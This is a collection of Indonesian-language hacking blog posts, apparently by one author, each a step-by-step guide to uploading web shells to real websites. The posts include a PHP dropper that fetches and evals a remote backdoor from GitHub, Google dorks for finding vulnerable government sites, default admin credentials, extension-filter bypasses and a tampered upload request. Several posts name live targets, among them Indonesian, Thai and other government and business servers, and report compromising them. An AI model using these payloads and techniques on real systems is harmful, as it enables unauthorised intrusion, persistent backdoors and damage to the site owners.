-

Hai Sobat.

Saya ikal,

Disini saya akan share sesuatu nih.

-

Pernah gak sih kalian capek capek ngelakuin injeksi sql dan berhasil tembus ke dashboard admin, eh pas udah upload shell, shellnya terdownload. Atau udah capek capek ngedork sana sini pakai google,bing,atau mungkin kalian sampai ngedork di duckduckgo pas nemu site vuln eh shell yang sudah terupload malah terdownload.

Nah mimin punya trik untuk membypassnya, Tapi pertama tama hal yang harus diperhatikan untuk melakukan trik ini ialah saat shell terdownload, code dari shell kita tereksekusi oleh server. Contohnya disini mimin punya site yang vuln terhadap JFU (Jquery File Upload), Dan saat selesai mimin upload webshell ketarget, mimin akses webshellnya yang terjadi adalah file webshell tadi terdownload. Tapi, saat mimin buka, code dari file tersebut telah tereksekusi.

Jika tereksekusi seperti diatas, berarti kita hanya tinggal melakukan RCE kesitarget saja, Disini mimin punya kebiasaan kalo mau melakukan RCE mimin bakal cek phpinfo nya dulu untuk mengetahui disable_function apa saja yang ada. Mimin upload code seperti ini.

<?php phpinfo(); ?>

Upload lalu akses filenya dan buka dicode editor apa saja. Dan saat mimin cek ternyata function system,passthru,exec,shell_exec didisable oleh server. yaudah lakuin ini aja biar garibet ribet.

Simpan code dibawah lalu upload file berisi code dibawah ke target kalian.

<?php

$dir = $_SERVER['DOCUMENT_ROOT'] . '/';
$file_to_write = 'shell.php';
$content_to_write = "<?php eval('?>'.file_get_contents('https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'));?>";
if( is_dir($dir) === false )
{
    mkdir($dir);
}
$file = fopen($dir . '/' . $file_to_write,"w");
fwrite($file, $content_to_write);
fclose($file);
include $dir . '/' . $file_to_write;

?>

Lalu upload kewebsite target kalian. Jika sudah berhasil terupload, akses file tadi maka kalian akan mendownload filenya. Jika sudah terdownload, lanjut kalian akses seperti ini.

https://localhost/shell.php

 Dan yap, shell kalian sudah tidak terdownload lagi, dan sudah berada didocument root.

Sekian, Terimakasih.

 -

Hai sobat

Saya ikal,

Disini saya akan sharing sharing nih.

-

Disini saya akan publish bug temuan saya ya, Bingung juga mau ngetik apaan, jdi singkat singkat aja ya :D.

Bahan : 

- CSRF : https://ambon.bawaslu.go.id/csrfbawas.php

- Dork : inurl:/dokumen/pengumuman/ site:*.bawaslu.go.id

              inurl:/dokumen/perbawaslu/ site:*.bawaslu.go.id

              inurl:/dokumen/bukusaku/ site:*.bawaslu.go.id

- Shell backdoor

- Akses shell : https://localhost/img/galeri/urshell.php

Pertama - tama, kalian ngedork menggunakan dork diatas. Jika sudah mendapatkan target, kalian cukup salin saja url website target kalian. lalu akses csrf nya.

Paste target kalian di form url, lalu klik button Lock. Jika sudah di lock, kalian tinggal pilih shell kalian dan klik button Send. 

Jika sudah klik Send, maka kalian akan diarahkan keurl target kalian dan akan muncul alert yang berisi Gagal. 

Tenang, Jika muncul alert Gagal berarti shell telah terupload. Kalian hanya tinggal mengakses shellnya saja. Dan tempat shellnya berada itu di /img/galeri/. 

Contoh : 

https://localhost/img/galeri/shell.php

Dan ya segini aja untuk artikelnya.

Thanks

See U

 -

Hai Sobat

Saya ikal,

Disini saya akan sharing sharing lagi nih.

-

 

Kali ini kita akan kembali membahas mengenai File Upload. Disini saya akan membahas trik yang bernama Double-Extension.

 

"In Apache, a php file might be executed using the doubleextension technique such as “file.php.jpg” when “.jpg” isallowed."

Source : Owasp.org

 

 Singkatnya adalah, kita menambahkan extensi lainnya setelah extensi php. Contoh "shell.php.jpg" dan terkadang server hanya akan mengeksekusi extensi pertamanya saja, Maybe :D. Trik ini dapat kita manfaatkan jika form upload memfilter hanya file dengan extensi ".jpg" saja,atau bisa juga untuk membypass settingan .htaccess order allow deny, namun tidak semua server dapat berhasil dibypass menggunakan trik ini, So, Use ur brain for use this trick Okay.

 

Kita praktekan saja langsung yah, saya akan praktekan diweb https://www.storelocatorwidgets.com/ . Disini settingan .htaccessnya seperti ini.

 

<FilesMatch "\.(php|php\.)$">
    Order Allow,Deny
    Deny from all
</FilesMatch>

"Bang kenapa ga bypass pake .PhP,.phtml,.php5,.php7 dll, kan bisa bang" iya gua tau, cuma kan gua mau publish artikel tentang ini :D.

Disini saya expetasikan saya berhasil mengupload file dengan extensi ".php" dan hasilnya seperti dibawah ini.

 

Yup, Forbidden. sekarang bagaimana jika kita tambahkan extensi lain dibelakang extensi ".php". Contoh kita upload dengan extensi ".php.txt". Dan seperti ini hasilnya.

Tereksekusi :D. Bagaimana jika kita tes dengan yang bukan extensi, seperti ".php.kontol". Lets see

Yup, Again. Mungkin kalian sudah paham konsepnya, jadi cukup 2 saja pembuktiannya :D. Dan seperti yang saya bilang diawal, trick Double-extensi ini tidak selalu work disemua server.

Jadi segini saja artikel kali ini, Bila ada yang salah kata atau yang lainnya biarkan saja :D.

Reference :

https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

 

Thanks

See U

 -

Hai sobat

Saya ikal, 

Disini saya akan sharing sesuatu nih. 

-

Kali ini kita akan membahas mengenai ildis lagi nih :D, kali ini di ildis v1 yah. ildis v1 sendiri di build di Bono Framework, dan saya sempat menemukan Vulnerability SQL Injection disana,  but i can't inject this site :D, ga tau itu type apa. 

So kali ini kita akan bahas default u/p nya.

Bahan :

- Dork : site:jdih.*.go.id

            site:jdih.*.*.go.id

            site:jdih.dprd.*.go.id

            site:jdih-dprd.*.go.id

- Login page : 

https://localhost/index.php/login

https://localhost/[path]/index.php/login

- Username : admin

- Password  : password

Login Page

/*\Login menggunakan username dan password diatas, dan jika vuln kalian akan dibawa kedalam dashboard admin.

Dashboard page

/*\Klik garis tiga di pojok kanan atas.

/*\Klik Dokumen.

/*\Klik Create. 

/*\Klik Lampiran. 

/*\Klik Tambah. 

/*\Upload shell kalian diform upload tersebut yah :D. Dan untuk akses shellnya di directory berikut. 

https://localhost/storage/document/shell.php

https://localhost/[path]/storage/document/shell.php

Thanks

See U. 

-

Hai Sobat

Saya ikal,

Disini saya akan sharing - sharing lagi nih.

-

Sudah lama tidak bertemu :D. Pasti kalian kangen ma w kan :D. Okeh langsung saja.

Sesuai Judul kita kali ini, kita akan membahas mengenai File Upload kembali. Kali ini agak berbeda sedikit, karena disini File Upload terjadi di Platform ASPX atau Content Management System (CMS) ASPX.

Okeh kita langsung saja masuk kepembahasan, 

Bahan :

- ASPX or ASP shell. :

https://raw.githubusercontent.com/xl7dev/WebShell/master/Aspx/ASPX%20Shell.aspx

- Google Dork : inurl:/ftb.imagegallery.aspx

                           intitle:Image Gallery ext:aspx

Seperti biasa, saya akan menerapkannya dengan sebuah live target biar lebih asik :D. Disini saya sudah ada live target, yaitu https://www.behm-dental.de/ftb.imagegallery.aspx 

 

 Yap, tampilan target saya seperti itu yah. Seperti yang saya anjurkan diatas, kalian membutuhkan ASPX shell, atau ASP shell untuk dijadikan backdoor. karena Jika kalian upload file PHP, makan tidak akan dimunculkan diserver :D.

Kalian bisa download saja langsung aspx shellnya diatas. Lalu simpan didevice kalian dengan extensi .aspx atau .asp . Lanjut kita balik kepembahasan, Jika tampilan target kalian seperti diatas, kalian langsung klik saja pilih file dan pilih shell aspxnya. Lalu klik Upload.

Jika dibarisan Message terdapat kata Image uploaded, Berarti shell kita berhasil terupload, Tinggal kita akses saja langsung :D.

Path shell : 

https://localhost/images/yourshellname.aspx

https://localhost/[path]/images/yourshellname.aspx

Taraaaaa.... Shell terupload :D.

Segini saja artikel kali ini :D, bila ada yang kurang atau salah kata biarkan saja :D.

Referensi :

https://www.exploit-db.com/exploits/14991

 

Thanks

See U

 -

Hai Sobat.

Saya ikal,

Disini saya akan share sesuatu nih.

-

 

Okeh kita langsung masuk aja kepembahasannya ya,

Bahan : 

- Dork : intitle:webboard site:go.th

              "by Allweb Technology"

- Shell backdoor dengan extensi .php5

- Exploit : 

https://localhost/webboard/plugins/editors/kcfinder/browse.php

https://localhost/[path]/webboard/plugins/editors/kcfinder/browse.php

Disini saya sudah mempunyai target sendiri yah, target saya beralamatkan http://sakarat.go.th//webboard/plugins/editors/kcfinder/browse.php 

Disini vulnerabilitynya adalah unrestricted file upload ya, jadi kita tinggal upload shell saja. Kalian klik button yang bertuliskan Upload dan pilih shell backdoor extensi .php5 kalian

Jika berhasil terupload, nama shell kalian akan muncul dibarisan situ :D. Lalu sekarang kita tinggal akses saja shell backdoor yang barusan tadi kita upload yaitu di path

https://localhost/webboard/images/files/YourShell.php5

https://localhost/[path]/webboard/images/files/YourShell.php5

Taraaaa... Kalian bebas mau diapain tuh server ya :D. Dan jika extension .php5 ga work, kalian bisa upload shell dengan extensi .pht or more :D.

Thanks

See U

-

Hai Sobat

Saya ikal,

Disini saya akan share sesuatu nih.

-

Sesuai judul kita kali ini, kita akan bereksperimen di sebuah plugin yang lumayan populer di web management ya, Okeh langsung saja kita masuk kepembahasannya langsung eaaa.

Bahan :

- Shell backdoor

- Dork : intitle:KCFinder: /files

              intitle:KCFinder: /images

 

Disini saya sudah memiliki target sendiri ya, Saya akan praktekan ditarget saya yang beralamatkan https://tpls-a.ccdmd.qc.ca/lib/kcfinder/browse.php Dan tampilan target saya seperti ini

 

Itu tampilan dari KCFinder target saya ya, Let's play the experimen. Pertama disini saya pastikan bahwa pluginnya bekerja atau tidak, dengan mengupload sebuah pure image ya,

Yup, gambar terupload tanpa adanya kendala. Kita coba upload shell backdoor kita masing masing dengan extensi .php 

 

Denied file extension.

 

Hmmm, File Extension tidak diperbolehkan untuk diupload. kita coba upload shell kita dengan extensi .php5 deh.

Masih tidak diperbolehkan :D, Bagaimana dengan extensi .php7, mari kita coba

 

Berhasil terupload, mari kita cek shellnya.

What hapen? Why blank? saya rasa php code dari shellnya tidak tereksekusi oleh server, Dan saat saya lakukan view-source saya mendapatkan ini :D

Benar dugaanku, bahwa php file yang diupload keserver tersebut dengan extensi .php7, code phpnya tidak akan tereksekusi. 

Bagaimana dengan extensi .phtml :D. Mari kita coba upload kembali.

F*ck of this shit, But i have crazy idea :D. Solusi untuk membypass filternya dan file yg terupload tereksekusi codenya adalah dengan extensi .pht, Mari kita coba

Gotchaa!. Mari kita cek shellnya.

Whoopsy, I got it :D. 

Ide ini saya dapatkan dari OWASP.org. kalian bisa kunjungi saja dibawah ini :

https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

Dan sedikit info nih, "Info apa tuch bang?". Info extensi apasaja yang tidak diperbolehkan dalam Plugin KCFinder.

Warn : Itu semua tergantung versi pluginnya ya, mungkin saja jika update nanti, extensi .pht akan masuk ban list juga :D

Versi KCFinder target saya adalah : 3.10

Thanks

See U

 

-

Hai Sobat

Saya ikal,

Disini Saya akan bawakan sebuah trik nih

-

Sesuai judul kita kali ini, disini kita masih membahas sebuah trik yang memakai fiture Inspect Element. Okeh ini berhubungan dengan Arbitrary File Upload atau Unrestricted File Upload, ya intinya Upload - Upload sewenang wenang :D.

Disini kita akan mempraktekannya di salah satu subdomain website Badan Pengawas Obat dan Makanan (POM). yang beralamatkan https://bpomsvr-0170.pom.go.id/ .

Disini Unrestricted File Upload Terjadi di form registrasi, disana sudah terdapat form registrasi jadi kalian tinggal mengklik saja, dan secara otomatis kalian akan diarahkan ke page registrasi.

Isi form yang ada lalu klik lanjut, isi asal saja dan ikutin arahan yang ada dari server.

isi kembali form yang ada lalu klik lanjut. (Isi asal saja).

Nah disini lah kita akan berksperimen :D, First kita upload shell dengan extensi .php dan hasilnya akan seperti dibawah ini

Format File Tidak Diperbolehkan!

 File tidak diperbolehkan :D, Coba kita upload file dengan extensi .jpg dan hasilnya akan seperti dibawah ini

File berhasil terupload dan server mencantumkan letak filenya :D, Bagaimana jika kita upload file dengan extensi .jpg lalu kita lakukan tamper data dan mengubah extensinya menjadi .php , Lets Try

Disini saya akan lakukan tamper data menggunakan Inspect Element yo, Bagi yang belum tau caranya bisa kunjungin post sebelumnya atau bisa klik saja link ini https://www.draxploit.web.id/2020/11/tamper-data-with-inspect-element-fiture.html

Disini saya mengupload sebuah pure gambar dengan nama DX.jpg, dan inilah request yang ditangkap. biar lebih jelas requestan yang ditangkap tadi saya taruh dibawah.

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="action"

upload

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="kdDok"

01

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="format"

jpg;jpeg;pdf

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="maxsize"

5242880

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="files"; filename="DX.jpg"

Content-Type: image/jpeg

ÿØÿà

Hmmmm, Saya ganti extensinya menjadi .php dan response servernya seperti ini

{"status":"false", "error":"Format File Tidak Diperbolehkan!", "path":"docs/reg/2020/12/1122281372/1122281372-01-20201210215118.php", "urll":"https://bpomsvr-0170.pom.go.id/index.php/download/data/ZG9jcy9yZWcvMjAyMC8xMi8xMTIyMjgxMzcyLzExMjIyODEzNzItMDEtMjAyMDEyMTAyMTUxMTgucGhw/DX.php", "ext":"php", "rename":"1122281372-01-20201210215118.php", "name":"DX.php", "filename":"DX", "size":"27826"}

Status = false, atau gagal terkirim. Hmmz namun terlihat letak filenya, coba kita akses saja https://bpomsvr-0170.pom.go.id/docs/reg/2020/12/1122281372/1122281372-01-20201210215118.php 

File tidak ada, Hmmmzzz. Mari kita coba lihat kembali requestan diatas, disini saya mencurigai salah satu requestannya yaitu 

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="format"

jpg;jpeg;pdf

Bagaimana jika ini extensi yang diperbolehkan, Bagaimana jika kita tambahkan satu extensi lain seperti ini lalu kita langsung mengupload file dengan extensi .php

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="format"

jpg;jpeg;pdf;php

Lets Try again :D.

Isi request : 

-----------------------------2534607582979961701751904158

Content-Disposition: form-data; name="action"

upload

-----------------------------2534607582979961701751904158

Content-Disposition: form-data; name="kdDok"

01

-----------------------------2534607582979961701751904158

Content-Disposition: form-data; name="format"

jpg;jpeg;pdf;php

-----------------------------2534607582979961701751904158

Content-Disposition: form-data; name="maxsize"

5242880

-----------------------------2534607582979961701751904158

Content-Disposition: form-data; name="files"; filename="whoopsy.php"

Content-Type: application/octet-stream

Dan ketika saya kirim requestannya, response yang saya dapat seperti ini

{"status":"true", "error":"", "path":"docs/reg/2020/12/1122281372/1122281372-01-20201210220417.php", "urll":"https://bpomsvr-0170.pom.go.id/index.php/download/data/ZG9jcy9yZWcvMjAyMC8xMi8xMTIyMjgxMzcyLzExMjIyODEzNzItMDEtMjAyMDEyMTAyMjA0MTcucGhw/whoopsy.php", "ext":"php", "rename":"1122281372-01-20201210220417.php", "name":"whoopsy.php", "filename":"whoopsy", "size":"179123"}

Status = true, mari kita cek filenya :D. https://bpomsvr-0170.pom.go.id/index.php/download/data/ZG9jcy9yZWcvMjAyMC8xMi8xMTIyMjgxMzcyLzExMjIyODEzNzItMDEtMjAyMDEyMTAyMjA0MTcucGhw/whoopsy.php

Tidak tereksekusi, bagaimana jika kita akses path satunya lagi yaitu di https://bpomsvr-0170.pom.go.id/docs/reg/2020/12/1122281372/1122281372-01-20201210220417.php 

And Look it this shit :D, Mission Success dude :D.

Okeh segini saja untuk artikel kali ini,

Thanks

See U